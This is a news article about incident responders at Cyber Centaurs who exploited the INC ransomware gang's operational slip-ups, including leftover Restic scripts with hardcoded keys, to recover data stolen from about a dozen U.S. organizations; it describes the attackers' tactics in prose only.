An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations.
A deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack, but exposed attacker infrastructure that stored data exfiltrated from multiple victims.
The operation was conducted by Cyber Centaurs, a digital forensics and incident response company that disclosed its success last November and now shared the full details with BleepingComputer.
The Cyber Centaurs investigation began after a client U.S. organization detected ransomware encryption activity on a production SQL Server.
The payload, a RainINC ransomware variant, was executed from the PerfLogs directory, which is typically created by Windows. However, ransomware actors have begun to use it more frequently for staging.
The researchers also noticed the presence of artifacts from the legitimate backup tool Restic, although data exfiltration had occurred during the lateral movement stage and the threat actor had not used the utility in this attack.
This caused a shift in the researchers' investigation "from incident response to infrastructure analysis."
The traces that INC ransomware left behind included renamed binaries (like ‘winupdate.exe’), PowerShell scripts to execute Restic, hardcoded repository configuration variables, and backup commands.
Restic-related remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkit.
One of the discovered PowerShell scripts, 'new.ps1', contained Base64-encoded commands for Restic and included hardcoded environment variables used to run the tool (access keys, repository paths, and S3 passwords for encrypted repositories).
... continue reading